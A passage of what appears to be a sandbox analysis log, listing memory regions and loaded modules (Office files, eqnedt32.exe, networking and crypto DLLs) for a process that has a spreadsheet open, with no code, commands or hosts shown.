0x15178fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000015160000" filename = "" Region: id = 653 start_va = 0x15180000 end_va = 0x15272fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 654 start_va = 0x15180000 end_va = 0x15272fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 655 start_va = 0x14cf0000 end_va = 0x14cf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000014cf0000" filename = "" Region: id = 656 start_va = 0x15180000 end_va = 0x151bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000015180000" filename = "" Region: id = 657 start_va = 0x151c0000 end_va = 0x152bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000151c0000" filename = "" Region: id = 658 start_va = 0x152c0000 end_va = 0x15478fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 659 start_va = 0x15480000 end_va = 0x15cfdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\1033\\grooveintlresource.dll") Region: id = 660 start_va = 0x14cf0000 end_va = 0x14cf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000014cf0000" filename = "" Region: id = 661 start_va = 0x67670000 end_va = 0x67680fff monitored = 0 entry_point = 0x67678fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 662 start_va = 0x14cf0000 end_va = 0x14cfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000014cf0000" filename = "" Region: id = 663 start_va = 0x67200000 end_va = 0x672befff monitored = 0 entry_point = 0x67231e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 664 start_va = 0x129b0000 end_va = 0x129bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000129b0000" filename = "" Region: id = 665 start_va = 0x129b0000 end_va = 0x129bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000129b0000" filename = "" Region: id = 666 start_va = 0x129b0000 end_va = 0x129bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000129b0000" filename = "" Region: id = 667 start_va = 0x67ea0000 end_va = 0x67eb5fff monitored = 0 entry_point = 0x67ea21d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 668 start_va = 0x129b0000 end_va = 0x129bafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000129b0000" filename = "" Region: id = 669 start_va = 0x129c0000 end_va = 0x129cafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000129c0000" filename = "" Region: id = 670 start_va = 0x129e0000 end_va = 0x129e8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000129e0000" filename = "" Region: id = 671 start_va = 0x12a00000 end_va = 0x12a08fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012a00000" filename = "" Region: id = 672 start_va = 0x12a30000 end_va = 0x12a30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012a30000" filename = "" Region: id = 673 start_va = 0x12a40000 end_va = 0x12a40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012a40000" filename = "" Region: id = 674 start_va = 0x15d00000 end_va = 0x160fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000015d00000" filename = "" Region: id = 675 start_va = 0x13d20000 end_va = 0x13d4efff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "_2201s_busan_hochiminh_.xlsx" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\_2201S_BUSAN_HOCHIMINH_.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\_2201s_busan_hochiminh_.xlsx") Region: id = 676 start_va = 0x13d20000 end_va = 0x13d20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013d20000" filename = "" Region: id = 677 start_va = 0x15d00000 end_va = 0x160fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000015d00000" filename = "" Region: id = 678 start_va = 0x13d30000 end_va = 0x13d5efff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "_2201s_busan_hochiminh_.xlsx" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\_2201S_BUSAN_HOCHIMINH_.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\_2201s_busan_hochiminh_.xlsx") Region: id = 679 start_va = 0x13d30000 end_va = 0x13d5efff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "_2201s_busan_hochiminh_.xlsx" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\_2201S_BUSAN_HOCHIMINH_.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\_2201s_busan_hochiminh_.xlsx") Region: id = 680 start_va = 0x13d30000 end_va = 0x13d5efff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "_2201s_busan_hochiminh_.xlsx" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\_2201S_BUSAN_HOCHIMINH_.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\_2201s_busan_hochiminh_.xlsx") Region: id = 681 start_va = 0x13d30000 end_va = 0x13daffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "_2201s_busan_hochiminh_.xlsx" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\_2201S_BUSAN_HOCHIMINH_.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\_2201s_busan_hochiminh_.xlsx") Region: id = 682 start_va = 0x13db0000 end_va = 0x13e2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "~df62d5f8e0d8ae73da.tmp" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\~DF62D5F8E0D8AE73DA.TMP" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\~df62d5f8e0d8ae73da.tmp") Region: id = 683 start_va = 0x13e30000 end_va = 0x13e3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013e30000" filename = "" Region: id = 684 start_va = 0x67e10000 end_va = 0x67e90fff monitored = 0 entry_point = 0x67e2b260 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 685 start_va = 0x13e30000 end_va = 0x13e30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013e30000" filename = "" Region: id = 686 start_va = 0x13e40000 end_va = 0x13e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013e40000" filename = "" Region: id = 687 start_va = 0x13e50000 end_va = 0x13e51fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013e50000" filename = "" Region: id = 688 start_va = 0x13e60000 end_va = 0x13e60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013e60000" filename = "" Region: id = 689 start_va = 0x6ce40000 end_va = 0x6ce72fff monitored = 0 entry_point = 0x6ce50e70 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 690 start_va = 0x14670000 end_va = 0x1470ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014670000" filename = "" Region: id = 691 start_va = 0x13e30000 end_va = 0x13e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013e30000" filename = "" Region: id = 692 start_va = 0x14710000 end_va = 0x1480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014710000" filename = "" Region: id = 693 start_va = 0x70e60000 end_va = 0x7104efff monitored = 0 entry_point = 0x70ea5e20 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\SysWOW64\\msxml6.dll" (normalized: "c:\\windows\\syswow64\\msxml6.dll") Region: id = 694 start_va = 0x14710000 end_va = 0x147dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014710000" filename = "" Region: id = 695 start_va = 0x14800000 end_va = 0x1480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014800000" filename = "" Region: id = 696 start_va = 0x13e30000 end_va = 0x13e30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\SysWOW64\\msxml6r.dll" (normalized: "c:\\windows\\syswow64\\msxml6r.dll") Region: id = 697 start_va = 0x13e50000 end_va = 0x13e53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013e50000" filename = "" Region: id = 698 start_va = 0x14a70000 end_va = 0x14b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014a70000" filename = "" Region: id = 699 start_va = 0x13e60000 end_va = 0x13e6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013e60000" filename = "" Region: id = 700 start_va = 0x13e60000 end_va = 0x13e63fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013e60000" filename = "" Region: id = 701 start_va = 0x13fd0000 end_va = 0x13fd1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013fd0000" filename = "" Region: id = 702 start_va = 0x13fe0000 end_va = 0x13fe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013fe0000" filename = "" Region: id = 703 start_va = 0x140f0000 end_va = 0x140f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000140f0000" filename = "" Region: id = 704 start_va = 0x14060000 end_va = 0x14061fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014060000" filename = "" Region: id = 705 start_va = 0x16100000 end_va = 0x165ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000016100000" filename = "" Region: id = 706 start_va = 0x13e60000 end_va = 0x13e6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013e60000" filename = "" Region: id = 707 start_va = 0x12f50000 end_va = 0x133cbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012f50000" filename = "" Region: id = 708 start_va = 0x13e60000 end_va = 0x13e6dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013e60000" filename = "" Region: id = 709 start_va = 0x13fd0000 end_va = 0x13fddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013fd0000" filename = "" Region: id = 710 start_va = 0x165e0000 end_va = 0x16a5bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000165e0000" filename = "" Region: id = 711 start_va = 0x16a60000 end_va = 0x16dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000016a60000" filename = "" Region: id = 712 start_va = 0x129b0000 end_va = 0x129b4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 713 start_va = 0x129c0000 end_va = 0x129cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 714 start_va = 0x133d0000 end_va = 0x134eafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000133d0000" filename = "" Region: id = 715 start_va = 0x133d0000 end_va = 0x134dcfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000133d0000" filename = "" Region: id = 716 start_va = 0x134e0000 end_va = 0x134fefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000134e0000" filename = "" Region: id = 717 start_va = 0x13500000 end_va = 0x1351efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013500000" filename = "" Region: id = 718 start_va = 0x13520000 end_va = 0x13521fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013520000" filename = "" Region: id = 719 start_va = 0x13530000 end_va = 0x13531fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013530000" filename = "" Region: id = 720 start_va = 0x13540000 end_va = 0x13541fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013540000" filename = "" Region: id = 721 start_va = 0x13540000 end_va = 0x1354ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013540000" filename = "" Region: id = 722 start_va = 0x13550000 end_va = 0x1355ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013550000" filename = "" Region: id = 723 start_va = 0x13560000 end_va = 0x13560fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013560000" filename = "" Region: id = 724 start_va = 0x13570000 end_va = 0x13570fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013570000" filename = "" Region: id = 725 start_va = 0x13580000 end_va = 0x13596fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013580000" filename = "" Region: id = 726 start_va = 0x135a0000 end_va = 0x135a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000135a0000" filename = "" Region: id = 727 start_va = 0x135b0000 end_va = 0x135c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000135b0000" filename = "" Region: id = 728 start_va = 0x135d0000 end_va = 0x135d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000135d0000" filename = "" Region: id = 729 start_va = 0x135e0000 end_va = 0x135e2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000135e0000" filename = "" Region: id = 730 start_va = 0x135f0000 end_va = 0x135f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000135f0000" filename = "" Region: id = 731 start_va = 0x13600000 end_va = 0x13600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013600000" filename = "" Region: id = 732 start_va = 0x13610000 end_va = 0x13610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013610000" filename = "" Region: id = 733 start_va = 0x13620000 end_va = 0x13623fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013620000" filename = "" Region: id = 734 start_va = 0x13630000 end_va = 0x13634fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013630000" filename = "" Region: id = 735 start_va = 0x13640000 end_va = 0x13640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013640000" filename = "" Region: id = 736 start_va = 0x13650000 end_va = 0x13652fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013650000" filename = "" Region: id = 737 start_va = 0x13660000 end_va = 0x13660fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013660000" filename = "" Region: id = 738 start_va = 0x13fe0000 end_va = 0x13fe2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013fe0000" filename = "" Region: id = 739 start_va = 0x14060000 end_va = 0x14060fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014060000" filename = "" Region: id = 740 start_va = 0x13540000 end_va = 0x13575fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013540000" filename = "" Region: id = 741 start_va = 0x13580000 end_va = 0x135b5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013580000" filename = "" Region: id = 742 start_va = 0x135c0000 end_va = 0x135cbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000135c0000" filename = "" Region: id = 743 start_va = 0x135d0000 end_va = 0x135dbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000135d0000" filename = "" Region: id = 744 start_va = 0x135f0000 end_va = 0x135f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000135f0000" filename = "" Region: id = 745 start_va = 0x15120000 end_va = 0x15230fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000015120000" filename = "" Region: id = 862 start_va = 0x135e0000 end_va = 0x135eafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000135e0000" filename = "" Region: id = 863 start_va = 0x135f0000 end_va = 0x135fafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000135f0000" filename = "" Region: id = 864 start_va = 0x13600000 end_va = 0x13600fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013600000" filename = "" Region: id = 865 start_va = 0x13620000 end_va = 0x13628fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013620000" filename = "" Region: id = 866 start_va = 0x13630000 end_va = 0x13638fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013630000" filename = "" Region: id = 867 start_va = 0x13640000 end_va = 0x13640fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013640000" filename = "" Region: id = 868 start_va = 0x16a60000 end_va = 0x16b35fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000016a60000" filename = "" Region: id = 869 start_va = 0x16b40000 end_va = 0x16c15fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000016b40000" filename = "" Region: id = 870 start_va = 0x16c20000 end_va = 0x16fa6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000016c20000" filename = "" Region: id = 871 start_va = 0x18060000 end_va = 0x183e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000018060000" filename = "" Region: id = 872 start_va = 0x183f0000 end_va = 0x19410fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000183f0000" filename = "" Region: id = 1150 start_va = 0xb060000 end_va = 0xb0e4fff monitored = 0 entry_point = 0xb0acd40 region_type = mapped_file name = "eqnedt32.exe" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\eqnedt32.exe" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\equation\\eqnedt32.exe") Region: id = 1165 start_va = 0xb060000 end_va = 0xb09ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b060000" filename = "" Region: id = 1166 start_va = 0xb0a0000 end_va = 0xb19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b0a0000" filename = "" Region: id = 1167 start_va = 0x722a0000 end_va = 0x722cefff monitored = 0 entry_point = 0x722abb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1168 start_va = 0x749e0000 end_va = 0x749e6fff monitored = 0 entry_point = 0x749e1e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1169 start_va = 0x72220000 end_va = 0x72232fff monitored = 0 entry_point = 0x722225d0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 1171 start_va = 0x72200000 end_va = 0x72213fff monitored = 0 entry_point = 0x72203c10 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 1172 start_va = 0x70aa0000 end_va = 0x70ab1fff monitored = 0 entry_point = 0x70aa4510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 1173 start_va = 0xb1a0000 end_va = 0xb1a0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 1174 start_va = 0x723a0000 end_va = 0x723eefff monitored = 0 entry_point = 0x723ad850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1175 start_va = 0x709f0000 end_va = 0x709f7fff monitored = 0 entry_point = 0x709f1fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1176 start_va = 0x722d0000 end_va = 0x72353fff monitored = 0 entry_point = 0x722f6530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1177 start_va = 0x67d00000 end_va = 0x67d67fff monitored = 0 entry_point = 0x67d270a0 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 1180 start_va = 0x72290000 end_va = 0x72297fff monitored = 0 entry_point = 0x72291920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1181 start_va = 0x72240000 end_va = 0x72286fff monitored = 0 entry_point = 0x722558d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1230 start_va = 0x70820000 end_va = 0x70883fff monitored = 0 entry_point = 0x7083afd0 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 1245 start_va = 0x76ca0000 end_va = 0x76e17fff monitored = 0 entry_point = 0x76cf8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1247 start_va = 0x74e70000 end_va = 0x74e7dfff monitored = 0 entry_point = 0x74e75410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1265 start_va = 0xb1b0000 end_va = 0xb1b2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1b0000" filename = "" Region: id = 1266 start_va = 0x70810000 end_va = 0x7081ffff monitored = 0 entry_point = 0x70814600 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 1268 start_va = 0x707f0000 end_va = 0x7080ffff monitored = 0 entry_point = 0x707fd120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 1269 start_va = 0x707c0000 end_va = 0x707ebfff monitored = 0 entry_point = 0x707dbb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 1272 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1c0000" filename = "" Region: id = 1303 start_va = 0x707a0000 end_va = 0x707b9fff monitored = 0 entry_point = 0x707afa70 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Region: id = 1341 start_va = 0x670a0000 end_va = 0x671a9fff monitored = 0 entry_point = 0x67101e10 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\SysWOW64\\webservices.dll" (normalized: "c:\\windows\\syswow64\\webservices.dll") Region: id = 1360 start_va = 0x70790000 end_va = 0x70797fff monitored = 0 entry_point = 0x70791d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 1363 start_va = 0xb1b0000 end_va = 0xb1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1b0000" filename = "" Region: id = 1364 start_va = 0xb1c0000 end_va = 0xb1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1c0000" filename = "" Region: id = 1365 start_va = 0xb1d0000 end_va = 0xb1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1d0000" filename = "" Region: id = 1366 start_va = 0xb1e0000 end_va = 0xb1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1e0000" filename = "" Region: id = 1367 start_va = 0xb1f0000 end_va = 0xb206fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1f0000" filename = "" Region: id = 1368 start_va = 0xb210000 end_va = 0xb210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b210000" filename = "" Region: id = 1369 start_va = 0xb220000 end_va = 0xb220fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b220000" filename = "" Region: id = 1370 start_va = 0xb230000 end_va = 0xb232fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b230000" filename = "" Region: id = 1371 start_va = 0xb240000 end_va = 0xb242fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b240000" filename = "" Region: id = 1372 start_va = 0xb250000 end_va = 0xb250fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b250000" filename = "" Region: id = 1373 start_va = 0xb260000 end_va = 0xb263fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b260000" filename = "" Region: id = 1374 start_va = 0xb270000 end_va = 0xb274fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b270000" filename = "" Region: id = 1375 start_va = 0xb280000 end_va = 0xb280fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b280000" filename = "" Region: id = 1376 start_va = 0xb290000 end_va = 0xb292fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b290000" filename = "" Region: id = 1377 start_va = 0xb2a0000 end_va = 0xb2a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2a0000" filename = "" Region: id = 1381 start_va = 0xb1b0000 end_va = 0xb1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1b0000" filename = "" Region: id = 1427 start_va = 0xb1b0000 end_va = 0xb1b2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1b0000" filename = "" Region: id = 1428 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1c0000" filename = "" Region: id = 1433 start_va = 0xb1b0000 end_va = 0xb1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1b0000" filename = "" Region: id = 1434 start_va = 0xb1c0000 end_va = 0xb4e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1c0000" filename = "" Region: id = 1435 start_va = 0x183f0000 end_va = 0x188e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000183f0000" filename = "" Region: id = 1436 start_va = 0xb4f0000 end_va = 0xb4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4f0000" filename = "" Region: id = 1437 start_va = 0xb500000 end_va = 0xb51bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b500000" filename = "" Region: id = 1438 start_va = 0xb520000 end_va = 0xb55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b520000" filename = "" Region: id = 1439 start_va = 0x13650000 end_va = 0x13666fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013650000" filename = "" Region: id = 1440 start_va = 0x188f0000 end_va = 0x189effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000188f0000" filename = "" Region: id = 1441 start_va = 0x14670000 end_va = 0x146affff monitored = 1 